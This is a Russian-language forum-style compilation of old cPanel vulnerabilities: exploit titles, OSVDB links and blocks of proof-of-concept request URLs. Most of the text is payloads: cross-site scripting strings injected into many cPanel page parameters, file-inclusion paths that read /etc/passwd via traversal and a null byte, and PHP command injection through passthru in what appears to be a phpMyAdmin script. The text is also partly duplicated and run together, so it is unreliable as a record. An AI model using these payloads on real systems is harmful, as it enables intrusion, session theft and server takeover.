Мой сегодняшний мини обзор уязвимостей посвящён cPanel.
Надеюсь вам будет интерестно и полезно
Exploits:
cPanel <= 10.8.x (cpwrap via mysqladmin) Local Root Exploit
cPanel <= 10.8.x (cpwrap via mysqladmin) Local Root Exploit (php)
cPanel <= 10.9.x (fantastico) Local File Inclusion Vulnerabilities
exploit for Cpanel 5 remote command execution
local cPanel <= 10.8.x cpwrap root exploit via mysqladmin
BasiliX <= 1.1.1 Remote File Include Exploit
exploit for Cpanel 5 remote command execution
Multiple xxs cPanel 10
CPanel 11 Multiple Cross-Site Scription
Exensive cPanel Cross Site Scripting
References:
Updated information can be found on OSVDB.org under the following entries:
http://www.osvdb.org/4208 cPanel testfile.html email Variable XSS
http://www.osvdb.org/4209 cPanel erredit.html file Variable XSS
http://www.osvdb.org/4210 cPanel dnslook.html dns Variable XSS
http://www.osvdb.org/4211 cPanel ignorelist.html account Variable XSS
http://www.osvdb.org/4212 cPanel showlog.html account Variable XSS
http://www.osvdb.org/4213 cPanel repairdb.html db Variable XSS
http://www.osvdb.org/4214 cPanel doaddftp.html login Variable XSS
http://www.osvdb.org/4215 cPanel editmsg.html account Variable XSS
http://www.osvdb.org/4243 cPanel del.html account Variable XSS
cPanel 10.9.1 XSS
XSS in Cpanel 10
cPanel Version 11 Pops.Html Cross-Site Scripting
cPanel Multiple Cross Site Scripting Vulnerability
CPanel 10 Multiple Cross Site Scription
Major Cpanel Expliot HTML Injection
Инклуды:
Поизвольное выполнение команд:
Раскрытие пути:
Надеюсь вам будет интерестно и полезно
Exploits:
cPanel <= 10.8.x (cpwrap via mysqladmin) Local Root Exploit
cPanel <= 10.8.x (cpwrap via mysqladmin) Local Root Exploit (php)
cPanel <= 10.9.x (fantastico) Local File Inclusion Vulnerabilities
exploit for Cpanel 5 remote command execution
local cPanel <= 10.8.x cpwrap root exploit via mysqladmin
BasiliX <= 1.1.1 Remote File Include Exploit
exploit for Cpanel 5 remote command execution
Multiple xxs cPanel 10
CPanel 11 Multiple Cross-Site Scription
Код:
http://target:2082/frontend/x/files/fileop.html?opdir=[PATH]&opfile=[FILENAME]&fileop=XSS
http://target:2082/frontend/x/files/editit.html?dir=/home/xdemo&file=XSS
http://target:2082/frontend/x/files/createdir.html?dir=XSS
http://target:2082/frontend/x/htaccess/dohtaccess.html?dir=xss
http://target:2082/frontend/x/err/erredit.html?dir=XSS
http://target:2082/frontend/x/err/erredit.html?dir=[DIRNAME]&file=XSS
http://target:2082/frontend/x/files/createfile.html?dir=XSSExensive cPanel Cross Site Scripting
Код:
[B]Systems Affected:[/B] cPanel 9.1.0-R85
To check cPanel for CSS, simply access the following example URLs in a browser:
http://[victim]/frontend/x/cpanelpro/ignorelist.
html?account="><script>alert('Vulnerable')</script>
http://[victim]/frontend/x/cpanelpro/showlog.
html?account=<script>alert('Vulnerable')</script>
http://[victim]/frontend/x/sql/repairdb.
html?db=<script>alert('Vulnerable')</script>
http://[victim]/frontend/x/ftp/doaddftp.
html?login="><script>alert('Vulnerable')</script>
http://[victim]/frontend/x/cpanelpro/editmsg.
html?account="><script>alert('Vulnerable')</script>
http://[victim]/frontend/x/testfile.
html?email=<script>alert('Vulnerable')</script>
http://[victim]/frontend/x2/err/erredit.
html?dir=public_html/&file=<script>alert('Vulnerable')</script>
http://[victim]/frontend/x2/net/dnslook.html?dns=</pre><script>window.location='s="fixed">http://www.cirt.net/'</script>
http://[victim]/frontend/x2/denyip/del.
html?ip=<script>alert('Vulnerable')</script>
http://[victim]/frontend/x2/htaccess/index.
html?dir=<script>alert('Vulnerable')</script>References:
Updated information can be found on OSVDB.org under the following entries:
http://www.osvdb.org/4208 cPanel testfile.html email Variable XSS
http://www.osvdb.org/4209 cPanel erredit.html file Variable XSS
http://www.osvdb.org/4210 cPanel dnslook.html dns Variable XSS
http://www.osvdb.org/4211 cPanel ignorelist.html account Variable XSS
http://www.osvdb.org/4212 cPanel showlog.html account Variable XSS
http://www.osvdb.org/4213 cPanel repairdb.html db Variable XSS
http://www.osvdb.org/4214 cPanel doaddftp.html login Variable XSS
http://www.osvdb.org/4215 cPanel editmsg.html account Variable XSS
http://www.osvdb.org/4243 cPanel del.html account Variable XSS
cPanel 10.9.1 XSS
Код:
cPanel 10.9.1 XSS
/frontend/x/htaccess/changepro.html?protected=1&resname=XSS_GOES_HERE
(click on Go Back...)XSS in Cpanel 10
Код:
[COLOR=DarkOrange][B]Exploit & Examples:[/B][/COLOR]
[B]Exploit:[/B]
http://[Target]:[Port]/[Dir]/x/files/select.html?dir=/&file= <h1><b>Your code here!!</b></h1>
[B]Javascript:[/B]
http://[Target]:2082/frontend/x/files/select.html?dir=/&file=<IMG src="javascript:alert('yeah');">
[B]Server Side Inclusion[/B]
http://[Target]:2082/frontend/x/files/select.html?dir=/&file=<!--#echo var="HTTP_REFERER" -->
[B]HTML [/B]
http://[Target]:2082/frontend/x/files/select.html?dir=/&file=<IFRAME SRC="index.html">cPanel Version 11 Pops.Html Cross-Site Scripting
Код:
http://target:2082/mail/pops.html?domain=XSScPanel Multiple Cross Site Scripting Vulnerability
Код:
[B]Affected scripts with proof of concept exploit:[/B]
http://www.vulnerable-site.com:2082/frontend/xcontroller/editquota.
html?email= <script>alert('vul')</script>&domain=
http://www.vulnerable-site.com:2082/frontend/xcontroller/dodelpop.
html?email= <script>alert('vul')</script>&domain=xxx
http://www.vulnerable-site.com:2082/frontend/xcontroller/diskusage.
html?showtree=0 "><script>alert('vul')</script>
http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.
html?mon=Jan&year=2006&domain=xxx&target= "><script>alert('vul')</script>
http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.
html?mon=Jan&year=2006&domain=xxx "><script>alert('vul')</script>&target=xxx
http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.
html?mon=Jan&year=2006 "><script>alert('vul')</script>&domain=xx
x&target=xxx
http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.
html?mon=Jan "><script>alert('vul')</script>&year=2006
&domain=xxx&target=xxxCPanel 10 Multiple Cross Site Scription
Код:
[COLOR=DarkOrange][B]CPanel file Manager:[/B][/COLOR]
PoC:
http://target.com:2082/frontend/[Servername]/files/seldir.html?dir=[XSS]
[COLOR=DarkOrange][B]CPanel Password Protect DIRS:[/B][/COLOR]
PoC:
http://target.com:2082/frontend/[servername]/htaccess/newuser.
html?user=[XSS]&pass=&dir=A VALID FOLDER
*Press Go Back (hyperlink)
[COLOR=DarkOrange][B]In Password Protected DIR:[/B][/COLOR]
PoC:
http://www.target:2082/frontend/[servername]/htaccess/newuser.
html?user=[XSS]&pass=&dir=[XSS]Major Cpanel Expliot HTML Injection
Код:
http://(domain):
2086/scripts/passwd?password=<>&domain=<>&user=<>Инклуды:
Код:
./tbl_replace.php?db=test&table=test&goto=/etc/hosts
./sql.php?goto=/etc/hosts&btnDrop=No
./export.php?what=../../../../../../etc/passwd%00Поизвольное выполнение команд:
Код:
./tbl_copy.php?strCopyTableOK=.passthru('/bin/ls').
./tbl_copy.php?db=test&table=test&new_name=test.test2&strCopyTableOK="".passthru('/bin/ls')."""Раскрытие пути:
Код:
./libraries/grab_globals.lib.php